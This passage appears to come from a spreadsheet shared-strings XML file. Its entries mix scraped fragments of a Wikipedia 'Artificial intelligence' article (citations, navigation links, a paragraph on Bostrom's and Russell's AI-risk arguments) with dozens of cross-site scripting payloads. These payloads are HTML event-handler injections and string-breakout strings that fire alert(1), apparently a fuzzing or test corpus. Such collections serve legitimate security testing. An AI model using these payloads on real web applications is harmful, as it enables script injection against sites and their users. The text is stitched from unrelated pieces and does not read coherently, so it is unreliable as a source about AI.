    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;summary style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/summary&gt;</t>
  </si>
  <si>
    <t>Stochastic temporal models:</t>
  </si>
  <si>
    <t>&lt;var onbeforepaste="alert(1)" contenteditable&gt;test&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Concept" title="Concept"&gt;Concept &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dialog onbeforecut="alert(1)" contenteditable&gt;test&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;p id=x tabindex=1 onfocus=alert(1)&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;td onclick="alert(1)"&gt;test&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Pain_(philosophy)" title="Pain (philosophy)"&gt;Pain &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;abbr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;rb onpointerout=alert(1)&gt;XSS&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;menu onpointerover=alert(1)&gt;XSS&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;embed ondrop=alert(1) contenteditable&gt;drop here&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;button onmouseup="alert(1)"&gt;test&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;textarea onfocusout=alert(1) id=x&gt;&lt;/textarea&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;if your opponent has played in a corner, take the opposite corner. Otherwise, &lt;/li&gt;</t>
  </si>
  <si>
    <t>d="alert('');\")"</t>
  </si>
  <si>
    <t>\";alert('');//</t>
  </si>
  <si>
    <t>&lt;output onkeyup="alert(1)" contenteditable&gt;test&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;frame id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/frame&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;datalist oncontextmenu="alert(1)"&gt;test&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;article onmousedown="alert(1)"&gt;test&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;table style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;output id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/output&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;span style="display: inline-block; margin-left: 4px; width: 182px; vertical-align: middle;"&gt;&lt;a href="https://en.wikiversity.org/wiki/Portal:Artificial_intelligence" class="extiw" title="v:Portal:Artificial intelligence"&gt;Resources &lt;/a&gt; from Wikiversity </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;Borowiec, Tracey Lien, Steven (2016). &lt;a rel="nofollow" class="external text" href="https://www.latimes.com/world/asia/la-fg-korea-alphago-20160312-story.html"&gt;"AlphaGo beats human Go champ in milestone for artificial intelligence" &lt;/a&gt;. &lt;i&gt;latimes.com &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;7 May </t>
  </si>
  <si>
    <t>&lt;sup id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/sup&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext onbeforecopy="alert(1)" contenteditable&gt;test&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;ins onclick="alert(1)"&gt;test&lt;/ins&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;Holley, Peter (28 January 2015). &lt;a rel="nofollow" class="external text" href="https://www.washingtonpost.com/news/the-switch/wp/2015/01/28/bill-gates-on-dangers-of-artificial-intelligence-dont-understand-why-some-people-are-not-concerned/"&gt;"Bill Gates on dangers of artificial intelligence: 'I don't understand why some people are not concerned&lt;span class="cs1-kern-right"&gt;' </t>
  </si>
  <si>
    <t>&lt;html oncopy="alert(1)" contenteditable&gt;test&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;center id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/center&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;embed onpointerout=alert(1)&gt;XSS&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;image style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;dfn onpointerout=alert(1)&gt;XSS&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;isindex onmouseover="alert(1)"&gt;test&lt;/isindex&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="http://www.igmchicago.org/surveys/robots-and-artificial-intelligence"&gt;"Robots and Artificial Intelligence" &lt;/a&gt;. &lt;i&gt;www.igmchicago.org &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;3 July </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Henri_Poincar%C3%A9" title="Henri Poincaré"&gt;Henri Poincaré &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;frame ondrop=alert(1) contenteditable&gt;drop here&lt;/frame&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Art </t>
  </si>
  <si>
    <t>&lt;datalist onkeydown="alert(1)" contenteditable&gt;test&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;embed draggable="true" ondragleave="alert(1)"&gt;test&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNewquist1994"&gt;Newquist 1994 &lt;/a&gt;, pp.&amp;#160;235–248 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;listing oncopy="alert(1)" contenteditable&gt;test&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;dfn style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, pp.&amp;#160;111–136 &lt;/li&gt;</t>
  </si>
  <si>
    <t>Researchers in the 1960s and the 1970s were convinced that symbolic approaches would eventually succeed in creating a machine with &lt;a href="/wiki/Artificial_general_intelligence" title="Artificial general intelligence"&gt;artificial general intelligence &lt;/a&gt; and considered this the goal of their field.</t>
  </si>
  <si>
    <t>&lt;data oncontextmenu="alert(1)"&gt;test&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;noscript onmousedown="alert(1)"&gt;test&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;blink id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/blink&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;281–298, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;frameset onbeforepaste="alert(1)" contenteditable&gt;test&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;q id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;cite draggable="true" ondragstart="alert(1)"&gt;test&lt;/cite&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;Brown, Noam; Sandholm, Tuomas (26 January 2018). &lt;a rel="nofollow" class="external text" href="http://science.sciencemag.org/content/359/6374/418"&gt;"Superhuman AI for heads-up no-limit poker: Libratus beats top professionals" &lt;/a&gt;. &lt;i&gt;Science &lt;/i&gt;. pp.&amp;#160;418–424. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1126%2Fscience.aao1733"&gt;10.1126/science.aao1733 &lt;/a&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;7 May </t>
  </si>
  <si>
    <t>&lt;meta name="referrer" content="origin"/&gt;</t>
  </si>
  <si>
    <t>&lt;base onpointerover=alert(1)&gt;XSS&lt;/base&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In his book &lt;i&gt;&lt;a href="/wiki/Superintelligence:_Paths,_Dangers,_Strategies" title="Superintelligence: Paths, Dangers, Strategies"&gt;Superintelligence &lt;/a&gt; &lt;/i&gt;, philosopher &lt;a href="/wiki/Nick_Bostrom" title="Nick Bostrom"&gt;Nick Bostrom &lt;/a&gt; provides an argument that artificial intelligence will pose a threat to humankind. He argues that sufficiently intelligent AI, if it chooses actions based on achieving some goal, will exhibit &lt;a href="/wiki/Instrumental_convergence" title="Instrumental convergence"&gt;convergent &lt;/a&gt; behavior such as acquiring resources or protecting itself from being shut down. If this AI's goals do not fully reflect humanity's—one example is an AI told to compute as many digits of pi as possible—it might harm humanity in order to acquire more resources or prevent itself from being shut down, ultimately to better achieve its goal.  Bostrom also emphasizes the difficulty of fully conveying humanity's values to an advanced AI.  He uses the hypothetical example of giving an AI the goal to make humans smile to illustrate a misguided attempt.  If the AI in that scenario were to become superintelligent, Bostrom argues, it may resort to methods that most humans would find horrifying, such as inserting "electrodes into the facial muscles of humans to cause constant, beaming grins" because that would be an efficient way to achieve its goal of making humans smile.&lt;sup id="cite_ref-368" class="reference"&gt;&lt;a href="#cite_note-368"&gt;&amp;#91;357&amp;#93; &lt;/a&gt; &lt;/sup&gt;  In his book &lt;i&gt;&lt;a href="/wiki/Human_Compatible" title="Human Compatible"&gt;Human Compatible &lt;/a&gt; &lt;/i&gt;, AI researcher &lt;a href="/wiki/Stuart_J._Russell" title="Stuart J. Russell"&gt;Stuart J. Russell &lt;/a&gt; echoes some of Bostrom's concerns while also proposing &lt;a href="/wiki/Human_Compatible#Russell&amp;#39;s_three_principles" title="Human Compatible"&gt;an approach &lt;/a&gt; to developing provably beneficial machines focused on uncertainty and deference to humans,&lt;sup id="cite_ref-HC_369-0" class="reference"&gt;&lt;a href="#cite_note-HC-369"&gt;&amp;#91;358&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup class="reference" style="white-space:nowrap;"&gt;:&lt;span&gt;173 </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;xss id=x style="transition:transform 10s" ontransitioncancel=alert(1)&gt;&lt;/xss&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;meter ondragover=alert(1) contenteditable&gt;drop here&lt;/meter&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;ul&gt;&lt;li&gt;&lt;cite class="citation encyclopaedia"&gt;&lt;a rel="nofollow" class="external text" href="http://www.iep.utm.edu/art-inte"&gt;"Artificial Intelligence" &lt;/a&gt;. &lt;i&gt;&lt;a href="/wiki/Internet_Encyclopedia_of_Philosophy" title="Internet Encyclopedia of Philosophy"&gt;Internet Encyclopedia of Philosophy &lt;/a&gt; &lt;/i&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=bookitem&amp;amp;rft.atitle=Artificial+Intelligence&amp;amp;rft.btitle=Internet+Encyclopedia+of+Philosophy&amp;amp;rft_id=http%3A%2F%2Fwww.iep.utm.edu%2Fart-inte&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;param ondblclick="alert(1)"&gt;test&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;image2 onpointerover=alert(1)&gt;XSS&lt;/image2&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;&lt;a href="/wiki/Human%E2%80%93computer_interaction" title="Human–computer interaction"&gt;Human–computer&lt;br /&gt;interaction &lt;/a&gt; &lt;/th&gt;&lt;td class="navbox-list navbox-even" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;td ondblclick="alert(1)"&gt;test&lt;/td&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Definitions </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Audit"&gt;Audit </t>
  </si>
  <si>
    <t>&lt;isindex id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;613–631 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Fallibilism" title="Fallibilism"&gt;Fallibilism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;button draggable="true" ondragend="alert(1)"&gt;test&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;ruby id=x tabindex=1 onactivate=alert(1)&gt;&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;video ondrop=alert(1) contenteditable&gt;drop here&lt;/video&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;div class="portal" role="navigation" id="p-wikibase-otherprojects"  aria-labelledby="p-wikibase-otherprojects-label"&gt;</t>
  </si>
  <si>
    <t>&lt;del onpointerup=alert(1)&gt;XSS&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;element onkeypress="alert(1)" contenteditable&gt;test&lt;/element&gt;</t>
  </si>
  <si>
    <t>document.write()</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;Within &lt;a href="/wiki/Developmental_robotics" title="Developmental robotics"&gt;developmental robotics &lt;/a&gt;, developmental learning approaches are elaborated upon to allow robots to accumulate repertoires of novel skills through autonomous self-exploration, social interaction with human teachers, and the use of guidance mechanisms (active learning, maturation, motor synergies, etc.).&lt;sup id="cite_ref-FOOTNOTEWengMcClellandPentlandSporns2001_168-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTEWengMcClellandPentlandSporns2001-168"&gt;&amp;#91;165&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-FOOTNOTELungarellaMettaPfeiferSandini2003_169-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTELungarellaMettaPfeiferSandini2003-169"&gt;&amp;#91;166&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-FOOTNOTEAsadaHosodaKuniyoshiIshiguro2009_170-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTEAsadaHosodaKuniyoshiIshiguro2009-170"&gt;&amp;#91;167&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-FOOTNOTEOudeyer2010_171-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTEOudeyer2010-171"&gt;&amp;#91;168&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;nextid onmouseout="alert(1)"&gt;test&lt;/nextid&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;li id="footer-poweredbyico"&gt;&lt;a href="https://www.mediawiki.org/"&gt;&lt;img src="/static/images/poweredby_mediawiki_88x31.png" alt="Powered by MediaWiki" srcset="/static/images/poweredby_mediawiki_132x47.png 1.5x, /static/images/poweredby_mediawiki_176x62.png 2x" width="88" height="31"/&gt; &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;at 10:11, Alistair Dabbs 22 Feb 2019. &lt;a rel="nofollow" class="external text" href="https://www.theregister.co.uk/2019/02/22/artificial_intelligence_you_know_it_isnt_real_yeah/"&gt;"Artificial Intelligence: You know it isn't real, yeah?" &lt;/a&gt;. &lt;i&gt;www.theregister.co.uk &lt;/i&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=www.theregister.co.uk&amp;amp;rft.atitle=Artificial+Intelligence%3A+You+know+it+isn%27t+real%2C+yeah%3F&amp;amp;rft.aulast=at+10%3A11&amp;amp;rft.aufirst=Alistair+Dabbs+22+Feb+2019&amp;amp;rft_id=https%3A%2F%2Fwww.theregister.co.uk%2F2019%2F02%2F22%2Fartificial_intelligence_you_know_it_isnt_real_yeah%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;template ondragover=alert(1) contenteditable&gt;drop here&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFCrevier1993"&gt;Crevier 1993 &lt;/a&gt;, pp.&amp;#160;115–117 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;head onpointerover=alert(1)&gt;XSS&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;svg onmouseleave="alert(1)"&gt;test&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFACM1998"&gt;ACM 1998 &lt;/a&gt;, I.2.10 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;ins id=x tabindex=1 onfocus=alert(1)&gt;&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;rtc onmouseover="alert(1)"&gt;test&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;p onpointerup=alert(1)&gt;XSS&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;tr onpointerover=alert(1)&gt;XSS&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;acronym onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/acronym&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;shadow id=x tabindex=1 onfocus=alert(1)&gt;&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;button id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;title onmousemove="alert(1)"&gt;test&lt;/title&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://joshworth.com/stop-calling-in-artificial-intelligence/"&gt;"Stop Calling it Artificial Intelligence" &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=unknown&amp;amp;rft.btitle=Stop+Calling+it+Artificial+Intelligence&amp;amp;rft_id=https%3A%2F%2Fjoshworth.com%2Fstop-calling-in-artificial-intelligence%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;" &lt;/a&gt;. &lt;i&gt;BBC News &lt;/i&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20170126133849/http://www.bbc.co.uk/news/health-38717928"&gt;Archived &lt;/a&gt; from the original on 26 January 2017&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;26 January </t>
  </si>
  <si>
    <t>&lt;var onpaste="alert(1)" contenteditable&gt;test&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;command ondblclick="alert(1)"&gt;test&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;nav id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;title onpointerleave=alert(1)&gt;XSS&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;title ondragover=alert(1) contenteditable&gt;drop here&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;span onload=alert(1)&gt;&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;397–438, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;bdo onpointerup=alert(1)&gt;XSS&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;html class="no-js" lang="en" &gt;</t>
  </si>
  <si>
    <t>&lt;video onpointerover=alert(1)&gt;XSS&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;noembed onpointermove=alert(1)&gt;XSS&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;element oncopy="alert(1)" contenteditable&gt;test&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Competitions_and_prizes_in_artificial_intelligence" title="Competitions and prizes in artificial intelligence"&gt;AI competitions &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;56–163 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;datalist onpointermove=alert(1)&gt;XSS&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;svg onpointerdown=alert(1)&gt;XSS&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;blink ondblclick="alert(1)"&gt;test&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/autothrottle.html"&gt;&lt;span class="doc"&gt;AutoThrottle extension</t>
  </si>
  <si>
    <t>&lt;figure onpointerenter=alert(1)&gt;XSS&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;big onpaste="alert(1)" contenteditable&gt;test&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;rp onkeyup="alert(1)" contenteditable&gt;test&lt;/rp&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;h3 id="p-namespaces-label"&gt;Namespaces &lt;/h3&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Bertrand_Russell" title="Bertrand Russell"&gt;Bertrand Russell &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup draggable="true" ondragend="alert(1)"&gt;test&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;table id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Dreyfus&amp;#39;_critique-355"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Dreyfus&amp;#39;_critique_355-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;xmp onblur=alert(1) tabindex=1 id=x&gt;&lt;/xmp&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;iframe onkeypress="alert(1)" contenteditable&gt;test&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;template onclick="alert(1)"&gt;test&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;output draggable="true" ondragstart="alert(1)"&gt;test&lt;/output&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-AI_in_the_80s-10"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-AI_in_the_80s_10-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-AI_in_the_80s_10-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-AI_in_the_80s_10-2"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;c &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;custom tags onpointerup=alert(1)&gt;XSS&lt;/custom tags&gt;</t>
  </si>
  <si>
    <t>&lt;noframes draggable="true" ondragstart="alert(1)"&gt;test&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;nobr onpointerover=alert(1)&gt;XSS&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onkeypress="alert(1)" contenteditable&gt;test&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;meter onpointerover=alert(1)&gt;XSS&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;frameset ondblclick="alert(1)"&gt;test&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;dl id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Accelerating_change" title="Accelerating change"&gt;Accelerating change &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;bdo onpointerout=alert(1)&gt;XSS&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;picture onmousemove="alert(1)"&gt;test&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;progress oncopy="alert(1)" contenteditable&gt;test&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;frame onmouseenter="alert(1)"&gt;test&lt;/frame&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEDomingos2015152-227"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEDomingos2015152_227-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-43"&gt;&lt;a href="#Military"&gt;&lt;span class="tocnumber"&gt;7.8 </t>
  </si>
  <si>
    <t>&lt;tr id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFCrevier1993"&gt;Crevier 1993 &lt;/a&gt;, pp.&amp;#160;113–114, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;wbr onbeforecut="alert(1)" contenteditable&gt;test&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;i id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/i&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;dl id=x tabindex=1 onactivate=alert(1)&gt;&lt;/dl&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-3 tocsection-54"&gt;&lt;a href="#Decrease_in_demand_for_human_labor"&gt;&lt;span class="tocnumber"&gt;8.2.4 </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLenatGuha1989"&gt;Lenat &amp;amp; Guha 1989 &lt;/a&gt; (Introduction) &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
